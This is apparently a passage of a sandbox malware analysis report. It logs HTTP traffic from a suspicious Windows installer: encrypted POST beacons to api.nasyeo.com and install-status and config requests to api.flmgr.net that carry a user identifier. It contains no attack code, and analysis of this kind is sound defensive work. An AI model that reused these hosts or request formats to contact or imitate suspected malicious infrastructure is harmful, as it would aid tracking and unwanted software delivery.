                                                                                      Data Raw: 75 43 47 45 6d 33 71 56 42 56 50 59 37 47 4b 4b 4a 6a 55 75 65 67 77 64 78 51 6c 4a 43 62 64 48 43 30 4a 62 67 50 44 6d 73 6b 41 4b 41 45 34 32 34 57 76 6b 68 53 4b 36 55 42 61 6b 48 77 4f 56 54 2b 76 36 45 43 47 63 36 62 71 4d 50 57 56 43 78 53 39 49 51 4a 31 51 46 4f 72 46 4e 62 65 43 72 66 69 6c 30 56 6e 48 4c 69 46 42 4f 52 68 32 51 62 68 67 48 35 58 62 57 4e 45 6c 64 32 35 6f 53 4d 37 74 30 65 36 5a 57 6f 44 65 75 4c 39 4b 48 63 6e 63 50 79 4c 57 71 34 67 61 30 63 7a 43 39 72 4f 63 75 76 6d 6b 5a 74 77 34 65 64 73 76 33 71 6e 45 58 48 62 58 6f 31 45 6a 7a 5a 48 53 59 32 44 47 4b 50 63 5a 71 51 6b 73 61 49 68 53 5a 6d 42 77 78 2b 45 58 41 69 2b 77 64 5a 63 73 39 38 48 46 39 58 62 4f 2f 53 30 66 4b 41 74 71 36 38 5a 43 6a 47 54 39 72 57 6a 72 45 42 39 31 43 39 41 53 51 62 54 6e 64 51 4e 47 67 36 59 59 67 76 30 46 75 33 6f 6d 41 4b 38 4b 39 58 73 44 39 53 4b 2b 79 39 32 54 36 70 46 63 70 38 63 79 36 34 36 4c 47 6f 75 34 53 4e 57 33 6a 59 34 6a 44 2b 50 35 2f 6d 33 67 2f 77 68 54 4c 4d 6e 38 35 61 75 34 5a 69 78 71 52 79 38 32 31 58 4a 55 45 54 41 44 48 33 77 68 4b 6e 2f 37 6c 62 72 45 6a 38 68 4a 31 45 45 30 75 51 7a 47 54 5a 41 38 4f 67 66 44 75 7a 52 44 41 79 6e 39 77 5a 76 37 66 59 46 79 68 50 38 4b 35 54 38 73 4c 66 6e 72 71 4f 4c 47 4b 31 51 67 59 59 41 4a 59 62 5a 61 57 59 58 4f 35 51 6b 6e 35 72 49 73 65 56 72 39 44 4c 2f 57 36 34 57 66 4e 7a 61 68 67 4b 44 4c 2f 2f 32 37 35 58 36 4b 67 79 36 61 63 31 69 76 71 32 6e 36 73 67 6e 51 55 37 55 78 4b 49 33 78 50 41 70 33 56 55 37 6a 46 74 31 41 61 32 73 32 42 43 68 47 76 78 70 50 39 52 2b 42 43 41 3d 3d
                                                                                      Data Ascii: uCGEm3qVBVPY7GKKJjUuegwdxQlJCbdHC0JbgPDmskAKAE424WvkhSK6UBakHwOVT+v6ECGc6bqMPWVCxS9IQJ1QFOrFNbeCrfil0VnHLiFBORh2QbhgH5XbWNEld25oSM7t0e6ZWoDeuL9KHcncPyLWq4ga0czC9rOcuvmkZtw4edsv3qnEXHbXo1EjzZHSY2DGKPcZqQksaIhSZmBwx+EXAi+wdZcs98HF9XbO/S0fKAtq68ZCjGT9rWjrEB91C9ASQbTndQNGg6YYgv0Fu3omAK8K9XsD9SK+y92T6pFcp8cy646LGou4SNW3jY4jD+P5/m3g/whTLMn85au4ZixqRy821XJUETADH3whKn/7lbrEj8hJ1EE0uQzGTZA8OgfDuzRDAyn9wZv7fYFyhP8K5T8sLfnrqOLGK1QgYYAJYbZaWYXO5Qkn5rIseVr9DL/W64WfNzahgKDL//275X6Kgy6ac1ivq2n6sgnQU7UxKI3xPAp3VU7jFt1Aa2s2BChGvxpP9R+BCA==
                                                                                      Aug 4, 2023 18:48:23.238993883 CEST124OUTPOST /log/next HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Proxy-Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: textPOST, application/xhtml+xml
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
                                                                                      Content-Length: 328
                                                                                      Host: api.nasyeo.com
                                                                                      Aug 4, 2023 18:48:23.239056110 CEST125OUTData Raw: 75 41 6e 68 77 79 36 56 62 45 79 4a 77 6e 53 58 4a 69 38 32 4d 68 59 63 32 56 39 4b 4c 4f 51 54 53 68 52 68 6a 4c 6a 30 74 30 6c 50 55 6c 70 34 70 69 37 37 30 6d 54 74 42 30 75 36 44 41 47 76 51 66 33 30 41 31 79 59 34 71 32 4d 4d 58 30 76 67 79
                                                                                      Data Ascii: uAnhwy6VbEyJwnSXJi82MhYc2V9KLOQTShRhjLj0t0lPUlp4pi770mTtB0u6DAGvQf30A1yY4q2MMX0vgyhIVrUTVf/UBOeLqeOz3hrRKidRcHFkUKl1fp7RC91iNGF+W9r2n6qxTfDU+v0JWZbdcDew84gK942EorfaqfPsfLlrOJxEmeyqH07B5Bkjq+e/IGuULKYKlS9qb4sIATFlm+UAalu7M8w39oyVs2+Oym0VKB1Co5I
                                                                                      Aug 4, 2023 18:48:27.263103008 CEST127OUTPOST /log/next HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Proxy-Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: textPOST, application/xhtml+xml
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
                                                                                      Content-Length: 328
                                                                                      Host: api.nasyeo.com
                                                                                      Data Raw: 75 41 6e 68 77 79 36 56 62 45 79 4a 77 6e 53 58 4a 69 38 32 4d 68 59 63 32 56 39 4b 4c 4f 51 54 53 68 52 68 6a 4c 6a 30 74 30 6c 50 55 6c 70 34 70 69 37 37 30 6d 54 74 42 30 75 36 44 41 47 76 51 66 33 30 41 31 79 59 34 71 32 4d 4d 58 30 76 67 79 68 49 56 72 55 54 56 66 2f 55 42 4f 65 4c 71 65 4f 7a 33 68 72 52 4b 69 64 52 63 48 46 6b 55 4b 6c 31 66 70 37 52 43 39 31 69 4e 47 46 2b 57 39 72 32 6e 36 71 78 54 66 44 55 2b 76 30 4a 57 5a 62 64 63 44 65 77 38 34 67 4b 39 34 32 45 6f 72 66 61 71 66 50 73 66 4c 6c 72 4f 4a 78 45 6d 65 79 71 48 30 37 42 35 42 6b 6a 71 2b 65 2f 49 47 75 55 4c 4b 59 4b 6c 53 39 71 62 34 73 49 41 54 46 6c 6d 2b 55 41 61 6c 75 37 4d 38 77 33 39 6f 79 56 73 32 2b 4f 79 6d 30 56 4b 42 31 43 6f 35 49 57 33 67 69 33 38 44 6d 2f 53 30 73 2b 57 64 42 45 41 2b 36 75 4e 68 6f 4b 79 74 67 58 78 61 39 43 69 58 46 72 4c 34 64 6c 74 43 39 43 73 48 58 75 75 4a 44 42 72 39 51 51 72 35 39 79 72 63 58 4a 46 70 71 7a 52 70 4c 2b 32 49 4a 75 41 63 76 58 6d 77 3d 3d
                                                                                      Data Ascii: uAnhwy6VbEyJwnSXJi82MhYc2V9KLOQTShRhjLj0t0lPUlp4pi770mTtB0u6DAGvQf30A1yY4q2MMX0vgyhIVrUTVf/UBOeLqeOz3hrRKidRcHFkUKl1fp7RC91iNGF+W9r2n6qxTfDU+v0JWZbdcDew84gK942EorfaqfPsfLlrOJxEmeyqH07B5Bkjq+e/IGuULKYKlS9qb4sIATFlm+UAalu7M8w39oyVs2+Oym0VKB1Co5IW3gi38Dm/S0s+WdBEA+6uNhoKytgXxa9CiXFrL4dltC9CsHXuuJDBr9QQr59yrcXJFpqzRpL+2IJuAcvXmw==
                                                                                      Aug 4, 2023 18:48:27.618323088 CEST127INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:27 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 0
                                                                                      Connection: keep-alive
                                                                                      Aug 4, 2023 18:48:28.602174997 CEST129INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:27 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 0
                                                                                      Connection: keep-alive
                                                                                      Aug 4, 2023 18:48:29.690623999 CEST134INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:27 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 0
                                                                                      Connection: keep-alive
                                                                                      Aug 4, 2023 18:48:45.371984005 CEST3175OUTPOST /log/close HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Proxy-Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: textPOST, application/xhtml+xml
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
                                                                                      Content-Length: 328
                                                                                      Host: api.nasyeo.com
                                                                                      Aug 4, 2023 18:48:45.372036934 CEST3175OUTData Raw: 75 41 6e 68 77 79 36 56 66 45 53 56 33 6e 66 42 4a 44 55 73 4d 45 70 5a 68 52 46 4b 4c 4f 51 54 53 68 52 68 68 36 33 76 75 46 6c 50 55 6c 70 34 36 6d 71 6e 6a 6e 7a 56 46 56 69 72 44 48 37 4b 42 36 6d 39 52 53 33 4d 76 66 32 4d 49 48 63 2f 6c 53
                                                                                      Data Ascii: uAnhwy6VfESV3nfBJDUsMEpZhRFKLOQTShRhh63vuFlPUlp46mqnjnzVFVirDH7KB6m9RS3Mvf2MIHc/lShYSY4RWdXWcK7En7X2lBjTJDNRblloeql3CtPuAdglenl+Q8yyy6qyT6fT/K8ODsSLdjDm89tZ9d3SruTW+ffudL9hL4JslcaqHTuQ1Bhk+f+/OC6FKqEIwi89bNleUDc0muFQPwjoMp0zp4zE4m+InT0ROFdqr7g
                                                                                      Aug 4, 2023 18:48:57.406656981 CEST3372OUTPOST /log/close HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Proxy-Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: textPOST, application/xhtml+xml
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
                                                                                      Content-Length: 328
                                                                                      Host: api.nasyeo.com
                                                                                      Data Raw: 75 41 6e 68 77 79 36 56 66 45 53 56 33 6e 66 42 4a 44 55 73 4d 45 70 5a 68 52 46 4b 4c 4f 51 54 53 68 52 68 68 36 33 76 75 46 6c 50 55 6c 70 34 36 6d 71 6e 6a 6e 7a 56 46 56 69 72 44 48 37 4b 42 36 6d 39 52 53 33 4d 76 66 32 4d 49 48 63 2f 6c 53 68 59 53 59 34 52 57 64 58 57 63 4b 37 45 6e 37 58 32 6c 42 6a 54 4a 44 4e 52 62 6c 6c 6f 65 71 6c 33 43 74 50 75 41 64 67 6c 65 6e 6c 2b 51 38 79 79 79 36 71 79 54 36 66 54 2f 4b 38 4f 44 73 53 4c 64 6a 44 6d 38 39 74 5a 39 64 33 53 72 75 54 57 2b 66 66 75 64 4c 39 68 4c 34 4a 73 6c 63 61 71 48 54 75 51 31 42 68 6b 2b 66 2b 2f 4f 43 36 46 4b 71 45 49 77 69 38 39 62 4e 6c 65 55 44 63 30 6d 75 46 51 50 77 6a 6f 4d 70 30 7a 70 34 7a 45 34 6d 2b 49 6e 54 30 52 4f 46 64 71 72 37 67 57 33 48 37 77 31 48 37 74 55 30 73 6d 53 4e 78 46 41 2b 6d 75 4d 41 4d 5a 30 66 41 62 37 36 39 41 2f 6a 5a 65 49 34 45 75 38 44 64 43 71 47 66 75 70 72 6a 4e 68 64 51 53 32 4e 52 4c 73 73 37 4e 55 63 69 72 52 6f 72 76 79 70 31 75 44 66 47 49 6d 33 61 65
                                                                                      Data Ascii: uAnhwy6VfESV3nfBJDUsMEpZhRFKLOQTShRhh63vuFlPUlp46mqnjnzVFVirDH7KB6m9RS3Mvf2MIHc/lShYSY4RWdXWcK7En7X2lBjTJDNRblloeql3CtPuAdglenl+Q8yyy6qyT6fT/K8ODsSLdjDm89tZ9d3SruTW+ffudL9hL4JslcaqHTuQ1Bhk+f+/OC6FKqEIwi89bNleUDc0muFQPwjoMp0zp4zE4m+InT0ROFdqr7gW3H7w1H7tU0smSNxFA+muMAMZ0fAb769A/jZeI4Eu8DdCqGfuprjNhdQS2NRLss7NUcirRorvyp1uDfGIm3ae
                                                                                      Aug 4, 2023 18:48:57.762201071 CEST3373INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:57 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 0
                                                                                      Connection: keep-alive
                                                                                      Aug 4, 2023 18:48:57.778717041 CEST3373OUTPOST /log/next HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Proxy-Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: textPOST, application/xhtml+xml
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
                                                                                      Content-Length: 360
                                                                                      Host: api.nasyeo.com
                                                                                      Aug 4, 2023 18:48:57.778717041 CEST3373OUTData Raw: 75 41 6e 68 77 79 36 56 66 6b 7a 59 6a 53 6a 44 58 79 38 75 49 31 70 46 6c 52 46 58 42 4f 52 75 52 6a 77 53 77 2f 36 69 6a 55 6b 65 48 51 59 73 70 6a 2f 78 77 6a 36 71 57 52 53 6e 4a 41 32 46 51 66 2b 48 54 6d 6d 59 37 72 6d 4d 4d 58 30 76 67 79
                                                                                      Data Ascii: uAnhwy6VfkzYjSjDXy8uI1pFlRFXBORuRjwSw/6ijUkeHQYspj/xwj6qWRSnJA2FQf+HTmmY7rmMMX0vgytaSosBR+zHcqLs7OGzxmmHe2NRfEFkUrtiHNOWZJNgNHkKEIH13+zqCeSE/u4SNdPNMyLRq4UL/ZuWoPbMrqW9Iu09LNN+iPvsWCvRtl427bn7NjyfLqZaxn1mON8eGgkjiKdBCBi6cNsiqJmCsmmPnD4QawUq5YY
                                                                                      Aug 4, 2023 18:48:59.047203064 CEST3461OUTData Raw: 75 41 6e 68 77 79 36 56 66 6b 7a 59 6a 53 6a 44 58 79 38 75 49 31 70 46 6c 52 46 58 42 4f 52 75 52 6a 77 53 77 2f 36 69 6a 55 6b 65 48 51 59 73 70 6a 2f 78 77 6a 36 71 57 52 53 6e 4a 41 32 46 51 66 2b 48 54 6d 6d 59 37 72 6d 4d 4d 58 30 76 67 79
                                                                                      Data Ascii: uAnhwy6VfkzYjSjDXy8uI1pFlRFXBORuRjwSw/6ijUkeHQYspj/xwj6qWRSnJA2FQf+HTmmY7rmMMX0vgytaSosBR+zHcqLs7OGzxmmHe2NRfEFkUrtiHNOWZJNgNHkKEIH13+zqCeSE/u4SNdPNMyLRq4UL/ZuWoPbMrqW9Iu09LNN+iPvsWCvRtl427bn7NjyfLqZaxn1mON8eGgkjiKdBCBi6cNsiqJmCsmmPnD4QawUq5YY
                                                                                      Aug 4, 2023 18:48:59.402657986 CEST3463INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:59 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 0
                                                                                      Connection: keep-alive
                                                                                      Aug 4, 2023 18:49:00.346143961 CEST3463INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:59 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 0
                                                                                      Connection: keep-alive


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      14192.168.2.349722123.57.49.3680C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:48:34.190393925 CEST152OUTGET /log/client/site_soft?Action=down_start&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&Checks=1&Err=0 HTTP/1.1
                                                                                      Cache-Control: no-store
                                                                                      Connection: Keep-Alive
                                                                                      Expires: 0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
                                                                                      Host: api.flmgr.net
                                                                                      Aug 4, 2023 18:48:34.500822067 CEST153INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:34 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 2
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 7b 7d
                                                                                      Data Ascii: {}
                                                                                      Aug 4, 2023 18:48:35.389081955 CEST155INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:34 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 2
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 7b 7d
                                                                                      Data Ascii: {}
                                                                                      Aug 4, 2023 18:48:45.655833006 CEST3176OUTGET /log/client/install?Action=suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&IsUpdgade=0&OldVer= HTTP/1.1
                                                                                      Cache-Control: no-store
                                                                                      Connection: Keep-Alive
                                                                                      Expires: 0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
                                                                                      Host: api.flmgr.net
                                                                                      Aug 4, 2023 18:48:45.966082096 CEST3177INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:45 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 2
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 7b 7d
                                                                                      Data Ascii: {}
                                                                                      Aug 4, 2023 18:48:46.844857931 CEST3177INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:45 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 2
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 7b 7d
                                                                                      Data Ascii: {}
                                                                                      Aug 4, 2023 18:48:47.996850967 CEST3178INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:45 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 2
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 7b 7d
                                                                                      Data Ascii: {}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      15192.168.2.349732123.57.49.3680C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:49:00.718626022 CEST3464OUTPOST /v1/client/configs HTTP/1.1
                                                                                      Host: api.flmgr.net
                                                                                      User-Agent: curl/7.84.0
                                                                                      Accept: */*
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 140
                                                                                      Data Raw: 75 41 6e 68 77 79 36 56 62 45 7a 59 6a 53 6a 44 4e 43 4d 47 4d 6c 68 4a 6c 32 59 56 51 37 59 52 53 67 77 53 77 62 75 7a 76 52 6b 4d 45 51 46 73 35 6e 6e 2f 31 57 4b 35 42 68 72 6f 47 52 33 42 55 4f 6a 68 52 54 72 5a 34 2b 6a 4d 63 33 56 70 67 7a 5a 67 57 70 38 54 56 34 6d 54 49 71 7a 47 39 75 47 78 31 52 54 44 4d 43 52 64 62 55 78 6d 58 49 4e 33 43 74 47 59 4f 64 59 69 66 54 39 38 57 64 61 77 33 2f 37 79 49 37 75 39
                                                                                      Data Ascii: uAnhwy6VbEzYjSjDNCMGMlhJl2YVQ7YRSgwSwbuzvRkMEQFs5nn/1WK5BhroGR3BUOjhRTrZ4+jMc3VpgzZgWp8TV4mTIqzG9uGx1RTDMCRdbUxmXIN3CtGYOdYifT98Wdaw3/7yI7u9
                                                                                      Aug 4, 2023 18:49:01.391006947 CEST3465OUTPOST /v1/client/configs HTTP/1.1
                                                                                      Host: api.flmgr.net
                                                                                      User-Agent: curl/7.84.0
                                                                                      Accept: */*
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 140
                                                                                      Data Raw: 75 41 6e 68 77 79 36 56 62 45 7a 59 6a 53 6a 44 4e 43 4d 47 4d 6c 68 4a 6c 32 59 56 51 37 59 52 53 67 77 53 77 62 75 7a 76 52 6b 4d 45 51 46 73 35 6e 6e 2f 31 57 4b 35 42 68 72 6f 47 52 33 42 55 4f 6a 68 52 54 72 5a 34 2b 6a 4d 63 33 56 70 67 7a 5a 67 57 70 38 54 56 34 6d 54 49 71 7a 47 39 75 47 78 31 52 54 44 4d 43 52 64 62 55 78 6d 58 49 4e 33 43 74 47 59 4f 64 59 69 66 54 39 38 57 64 61 77 33 2f 37 79 49 37 75 39
                                                                                      Data Ascii: uAnhwy6VbEzYjSjDNCMGMlhJl2YVQ7YRSgwSwbuzvRkMEQFs5nn/1WK5BhroGR3BUOjhRTrZ4+jMc3VpgzZgWp8TV4mTIqzG9uGx1RTDMCRdbUxmXIN3CtGYOdYifT98Wdaw3/7yI7u9
                                                                                      Aug 4, 2023 18:49:02.359859943 CEST3470OUTPOST /v1/client/configs HTTP/1.1
                                                                                      Host: api.flmgr.net
                                                                                      User-Agent: curl/7.84.0
                                                                                      Accept: */*
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 140
                                                                                      Data Raw: 75 41 6e 68 77 79 36 56 62 45 7a 59 6a 53 6a 44 4e 43 4d 47 4d 6c 68 4a 6c 32 59 56 51 37 59 52 53 67 77 53 77 62 75 7a 76 52 6b 4d 45 51 46 73 35 6e 6e 2f 31 57 4b 35 42 68 72 6f 47 52 33 42 55 4f 6a 68 52 54 72 5a 34 2b 6a 4d 63 33 56 70 67 7a 5a 67 57 70 38 54 56 34 6d 54 49 71 7a 47 39 75 47 78 31 52 54 44 4d 43 52 64 62 55 78 6d 58 49 4e 33 43 74 47 59 4f 64 59 69 66 54 39 38 57 64 61 77 33 2f 37 79 49 37 75 39
                                                                                      Data Ascii: uAnhwy6VbEzYjSjDNCMGMlhJl2YVQ7YRSgwSwbuzvRkMEQFs5nn/1WK5BhroGR3BUOjhRTrZ4+jMc3VpgzZgWp8TV4mTIqzG9uGx1RTDMCRdbUxmXIN3CtGYOdYifT98Wdaw3/7yI7u9
                                                                                      Aug 4, 2023 18:49:02.677100897 CEST3471INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:49:02 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 800
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 75 43 47 43 6a 32 48 45 57 6d 71 4f 77 7a 44 5a 4a 6a 34 75 50 6c 6f 73 7a 56 6f 53 5a 61 74 47 42 45 49 51 32 66 79 7a 2f 41 46 50 4e 78 67 73 70 69 58 70 30 33 4c 7a 46 7a 33 7a 57 6e 37 42 51 2b 66 32 46 53 33 41 70 5a 76 48 66 53 4a 42 77 48 63 50 4b 74 35 42 42 72 72 55 61 71 7a 58 37 75 32 78 6f 6c 4f 42 62 57 63 77 4e 51 38 39 55 72 4e 31 47 74 4f 57 54 50 55 70 5a 69 67 71 4f 6f 58 6b 68 49 6d 6f 54 4b 58 43 76 71 6b 63 42 64 48 63 4d 53 79 6e 67 6f 49 67 38 73 2f 31 38 72 4f 4e 38 2b 48 6c 5a 72 31 37 4e 70 49 48 31 37 2f 2b 58 48 66 65 7a 41 78 7a 71 65 65 39 4d 79 79 4c 62 64 77 4b 67 41 30 32 61 49 35 58 46 44 6b 68 6d 61 56 50 66 79 57 2b 64 4b 70 71 2f 63 36 43 37 58 6a 64 69 6e 4e 52 57 6b 4d 6e 39 39 31 56 6b 7a 4b 42 36 6e 54 6f 55 31 45 2b 57 64 78 59 44 34 6e 79 61 46 6c 48 68 62 31 62 73 50 30 4d 2f 43 34 72 4c 70 63 7a 35 43 39 4e 76 54 43 37 34 37 53 48 34 35 6c 56 69 74 68 79 76 74 53 55 51 39 50 6e 4f 64 47 6f 6d 73 6b 37 54 71 54 45 35 53 58 38 77 67 74 5a 59 61 53 75 33 2b 48 74 4d 78 52 37 51 53 77 71 67 54 77 58 44 7a 30 52 56 54 46 31 5a 43 65 33 33 50 7a 2f 69 73 63 65 39 30 73 6b 38 30 2b 4d 42 6f 39 73 62 30 54 6e 6f 47 70 4e 4b 79 54 77 77 4f 57 68 51 4a 6f 73 30 61 45 65 72 48 4a 37 64 61 4b 6a 6f 66 2f 44 4e 31 59 2b 5a 4a 38 41 45 66 70 47 57 49 66 55 6f 46 52 67 73 75 38 39 4c 6c 75 79 43 37 76 63 39 59 53 66 66 32 54 33 6b 37 6e 64 72 66 62 6d 73 33 62 4d 32 79 66 4b 4a 6b 6d 6c 36 44 6a 36 38 78 4c 51 48 50 38 48 4f 59 58 53 4d 41 55 77 58 55 34 38 75 57 4b 54 31 64 4c 79 6d 2b 50 48 61 4d 33 54 47 74 76 4f 45 47 35 54 6d 46 63 57 56 34 42 4b 6e 71 6f 69 72 78 6a 4b 42 4e 46 78 72 72 69 65 43 42 4c 53 2b 73 4d 5a 54 63 61 59 6f 6f 65 6c 32 47 75 69 58 36 61 59 6b 7a 54 67 41 65 63 73 6b 73 62 5a 34 4f 36 46 35 67 70 49 42 67 6f 37 58 74 47 47 33 2f 56 49 54 54 30 6c 42 33 4e 4b 72 35 6c 39 41 31 63 4d 6b 4f 71 74 2b 46 70 6f 68 4d 4e 71 4c 47 6f 65 68 45 49 71 59 48 6b 7a 47 37 63 74 36 62 31 35 74 31 63 46 38 6b 36 69 4b 2f 7a 30 49 64 70 74 4f 5a 75 4f 33 49 66 56 6f 53 56 36 73 49 50 41 42 45 49 6b 58 6b 39 4a 31 63 76 66 68 33 45 74 69 76 52 4d 5a 71 44 4a 53 43
